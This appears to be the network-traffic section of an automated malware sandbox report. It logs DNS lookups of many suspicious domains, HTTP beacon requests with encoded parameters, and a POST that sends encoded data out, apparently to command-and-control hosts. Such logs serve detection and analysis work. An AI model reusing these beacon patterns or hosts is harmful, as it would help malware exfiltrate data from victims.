                      Source: global trafficHTTP traffic detected: GET /ydza/?JZOtU=YQDMT/cjjLIrhYhQh0Q2mCJ/3eTpFU2r2WGK9Y1kX6vo8j7CWoL4SlIzIlGkR2TnTHSV+ODB3q8FGPL6osY1Ov0k4N9JYf0vMjBOMK/CTnPE/e/ddHfEQpw=&Tr=kdnPUNSPd0 HTTP/1.1Host: www.taxitayninh365.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                      Source: global trafficHTTP traffic detected: GET /fsgl/?JZOtU=C9QsHkK47GSD7r6QEBJq03ghiAkwTDhYbFs9cpfO+uKQdjQ23Lhhb84Ia8cTOlIJgW821ZMigtRpVm/E2N9Fm2iWKgKq9aIKjjivs8jTrOy3xS+oUeAgIDw=&Tr=kdnPUNSPd0 HTTP/1.1Host: www.rtpmesinkoin.clickAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                      Source: global trafficHTTP traffic detected: GET /cbfz/?JZOtU=wkx2NXiTkimKkWVHj8I851tghrwYfKl5WgEr82Da3v6V9hQpjwkjAwPIlceTp9yKNyaCzMrAs840f3u2xWNXS0bDb8L6xc5FYKVawF3pRnx98U9Wx8trKU0=&Tr=kdnPUNSPd0 HTTP/1.1Host: www.cortisalincontrol.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                      Source: global trafficHTTP traffic detected: GET /fqxx/?JZOtU=EQE6/f8JwKBVpYrOhw4vrtxv3XcBNO3b0nglp3s8GuOVuBTyHurIT2AdZcstinw02q63t984fSctf9ZXgFK38aa77s170gQvTYOFwikxrd70F79vmCfQ9/M=&Tr=kdnPUNSPd0 HTTP/1.1Host: www.carsten.studioAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                      Source: global trafficHTTP traffic detected: GET /lqxd/?Tr=kdnPUNSPd0&JZOtU=wYwrhtOuglxnIn2/Olpi5JeqaOWyslXDKK1NgpC20GbgYEDR8w6xmbtuhBCgj8a/1RMYy9cnrRcVYl1JPFOG8jxHm9ssQM04UUNFlfB4f7o0+HklJ+ipcCU= HTTP/1.1Host: www.conseilnsaftogo.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                      Source: global trafficDNS traffic detected: DNS query: www.laohub10.net
                      Source: global trafficDNS traffic detected: DNS query: www.5tuohbpzyj9.buzz
                      Source: global trafficDNS traffic detected: DNS query: www.canadavinreport.site
                      Source: global trafficDNS traffic detected: DNS query: www.phoenix88.sbs
                      Source: global trafficDNS traffic detected: DNS query: www.ana-silverco.shop
                      Source: global trafficDNS traffic detected: DNS query: www.gadgetre.info
                      Source: global trafficDNS traffic detected: DNS query: www.acc888ommodate.xyz
                      Source: global trafficDNS traffic detected: DNS query: www.nb-shenshi.buzz
                      Source: global trafficDNS traffic detected: DNS query: www.taxitayninh365.site
                      Source: global trafficDNS traffic detected: DNS query: www.rtpmesinkoin.click
                      Source: global trafficDNS traffic detected: DNS query: www.cortisalincontrol.net
                      Source: global trafficDNS traffic detected: DNS query: www.carsten.studio
                      Source: global trafficDNS traffic detected: DNS query: www.conseilnsaftogo.org
                      Source: global trafficDNS traffic detected: DNS query: www.speedfactory.shop
                      Source: unknownHTTP traffic detected: POST /abgi/ HTTP/1.1Host: www.5tuohbpzyj9.buzzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.5Origin: http://www.5tuohbpzyj9.buzzContent-Length: 202Connection: closeCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedReferer: http://www.5tuohbpzyj9.buzz/abgi/User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+Data Raw: 4a 5a 4f 74 55 3d 47 71 45 39 64 77 56 65 7a 49 48 62 35 61 4d 6c 59 75 6d 48 52 4e 77 34 34 75 5a 46 4e 69 32 61 53 58 66 52 6a 35 35 36 6c 2f 4d 46 30 54 31 4a 4a 7a 41 70 32 75 4a 54 48 55 61 59 42 6e 79 51 57 46 4c 66 45 4c 56 59 79 52 42 4f 53 4d 47 51 79 78 4b 6b 4e 2b 4b 61 6f 55 6c 39 48 56 62 71 6d 4e 4a 50 45 31 47 6f 66 59 48 69 33 73 44 73 72 43 50 34 56 6d 65 79 47 42 43 49 64 64 75 50 56 42 5a 38 79 77 61 63 6e 4f 35 59 48 75 72 50 38 4d 67 77 58 74 33 34 37 47 63 67 30 6e 53 2b 63 70 68 33 30 67 35 2b 43 33 71 54 4f 6e 6e 58 2b 71 76 74 5a 51 46 79 66 2b 71 59 54 78 66 2f 6d 77 3d 3d Data Ascii: JZOtU=GqE9dwVezIHb5aMlYumHRNw44uZFNi2aSXfRj556l/MF0T1JJzAp2uJTHUaYBnyQWFLfELVYyRBOSMGQyxKkN+KaoUl9HVbqmNJPE1GofYHi3sDsrCP4VmeyGBCIdduPVBZ8ywacnO5YHurP8MgwXt347Gcg0nS+cph30g5+C3qTOnnX+qvtZQFyf+qYTxf/mw==
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 29 Nov 2024 08:16:19 GMTContent-Type: text/htmlContent-Length: 566Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Nov 2024 08:16:51 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZLS0Lu0gqL6tzqnbwqC5QEw7DbKy6XrI0qZVTtuLgooDy69F0WfMwDLoS%2BVJ9ZcL2mQhYRsywsOsYW1ArnytYh%2FjfbJ70z%2BWHsDS%2FSAgwsbOFvejD%2FYm1ImETG3bvqGlArpV7lYlGJw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ea1286f99d743f3-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2098&min_rtt=2098&rtt_var=1049&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=787&delivery_rate=0&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 190
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Nov 2024 08:16:53 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h7CggccxsnXW%2FhR0TLeo3isDXG0YO%2BU95m02KrP0%2FlwXJBfHFrDD8CsGNsYNJFeYyQJ2UPf346%2BBXIpyxLCsnTQ78217dWrkbPm0%2FPzX7v0YRj2Rz0BmKLHbZyiUwj9mo6xA8136a0U%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ea128804e011a48-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1995&min_rtt=1995&rtt_var=997&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=807&delivery_rate=0&cwnd=153&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 190
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Nov 2024 08:16:56 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DYIhPh5v91Vr9cSSWglbYsqmgEjmFNNTRNR9DFBZZYyXgQSJYG%2BqypCdB7%2FbvwFgNfBnDWmd1MXkIp66zuJryFxLmbksWF73QJgMtCqSQ6MeX8P6cdsIlGG5COl1AMNrSJTRKiIvxn4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ea128917f277293-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1974&min_rtt=1974&rtt_var=987&sent=5&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10889&delivery_rate=0&cwnd=156&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 190
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Nov 2024 08:16:59 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ROENz4pmIO7tJtmEOnMzBV%2FbbB7QtIGe1M99XebE7TAis5sSU4olrQyJWrvygdyHvCAQrzF%2FDBLGiuL9ZkIep2vUU7YHxsV20LdPGHamYhcno%2FhwQStRNrItpxxIYt1C5QIwFAqa%2FTE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ea128a269f743b2-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1679&min_rtt=1679&rtt_var=839&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=511&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Nov 2024 08:17:06 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Nov 2024 08:17:09 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Nov 2024 08:17:11 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Nov 2024 08:17:14 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 29 Nov 2024 08:17:21 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 29 Nov 2024 08:17:24 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 29 Nov 2024 08:17:26 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 29 Nov 2024 08:17:29 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 29 Nov 2024 08:17:36 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 